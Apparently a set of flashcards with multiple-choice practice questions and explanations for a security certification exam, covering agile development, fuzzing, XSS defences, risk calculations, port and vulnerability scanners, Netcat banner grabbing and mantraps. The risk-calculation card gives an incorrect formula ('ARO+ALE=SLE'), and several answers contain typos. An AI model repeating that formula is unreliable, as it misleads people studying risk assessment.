Practice Questions 121-132 Flashcards
Management at your organization is planning to hire a development firm to create a sophisticated web application. One of the primary goals is to ensure that personnel involved with the project frequently collaborate with each other throughout the project. Which is an appropriate model for this project? A. Waterfall B. SOLC C. Agile D. Secure DevOps
The agile software development is flexible, ensures that personnel interact with each other throughout a project and is the best of the available choices.
Your organization is preparing to deploy a web-based application which will accept user input. Which is the BEST test to the reliability of this application to maintain availability and data integrity? A. Model verification B. Input Validation C. Error handing D. Dynamic analysis
Dynamic analysis techniques (like fuzzing) can test the application’s ability to maintain availability and data integrity for some scenarios. Fuzzing sends random to an application to verify the random data doesn’t crash the application or expose the system to a data breach.
An attacker has launched several successful XXS attacks on a web application within you DMZ. Which is the BEST choice to protect the web server and prevent this attack? Select 2. A. Dynamic code analysis B. Input validation C. Code obfuscation D. WAF
Input validation and web application firewall (WAF) are the best choices because both provide protection against cross site scripting (XSS) attacks. Input validation validates data before using it to help prevent XSS attacks.
WAF acts as an additional firewall that monitors filters or blocks HTTP traffic to a web server
Ziffcorp is developing a new technology that expect to become a huge success when it's released. The CIO is concerned about someone stealing their company secrets related to this technology. Which will help the CIO identify potential dangers related to the loss of this technology? A. Threat assessment B. Vulnerability assessment C. Privacy threshold assessment D. Privacy impact assessment
A threat assessment evaluates potential dangers that can compromise the confidentiality, integrity and availability of data or a system. it evaluates threats and attempts to identify the potential impact from threats.
You are performing a risk assessment and you need to calculate the average expected loss of an incident. Which value combination would you MOST likely use? A. ALE and ARO B. ALE and SLE C. SLE and ARO D. ARO and ROI
To find the average expected loss the single loss expectancy (SLE) can be calculated with the Annual loss expectancy (ALE) and the Annual Rate of Occurrence (ARO)
ARO+ALE=SLE
You recently completed a vulnerability scan on your network. It reported that several servers are missing key operating system patches. However, after checking the servers, you've verified the servers have these patches installed. Which BEST describes this? A. False negative B. Misconfiguration on servers C. False postive D. Non-creditentialed scan
Due to the vulnerability scanner reporting a false positive indicating that the servers had a vulnerability, but in reality the servers did not have the vulnerability.
You want to identify all the services running on a server in your network. Which tools is the BEST choice meets this goal? A. Penetration test B. Protocol analyzer C.Sniffer D. Port Scanner
A port scanner identifies open ports in a system and is commonly used to determine what services are running on the system.
Lisa needs to identify if a risk exists within web application and identify potential misconfigurations on the server However, she should passively test the security controls. Which is BEST choice to meet this goal?
A. Perform a penetration test.
B. Perform a port scan
C. Perform a vulnerability scan
D. Perform traffic analysis with a sniffer.
Vulnerability scan identifies that attackers can potentially exploit and vulnerability scanners perform passive testing.
A network administrator needs to identify the type of traffic and packet flags used in traffic sent from a specific IP address. Which is the BEST tool to meet this goal? A. SIEM B. Netcat C. Protocol analyzer D. Vulnerability scan
A protocol analyzer (sniffer) can capture traffic sent over a network and identify the type of traffic the source of the traffic and the protocol flags used within individual packets.
Lisa has been hired as a penetration tester by your organization to test the security of a web server. She wants to identify the operating system and get some information on services and applications by the server. Which tool is BEST to meet this need? A. SIEM B. Netcat C. Tcpdump D. Gray box test.
Netcat can easily be used for banner grabbing and banner will provide her information o the operating system and get some information on services and applications used by the server.
An organization wants to provide protection against malware attacks. Administrators have installed antivirus software on al computers. Additionally, they implemented a firewall and an IDS on the network. Which BEST identifies this principle? A. Implicit deny B. Layered Security C. Least privilege D. Flood guard
Layered security (defense in depth) implements multiple controls to provide several layers of protection.
A security professional needs to identify a physical security control that will identify and authenticate individuals before allowing them to pass, and restrict passage to only a single person at a time. Which should the professional recommend? A. Tailgating B. Smart cards C. Biometrics D. Mantraps
Mantraps control access to a secure area and only allows a single person to pass at a time. In this scenario the social engineering tactic of tailgating nit the control to prevent it.
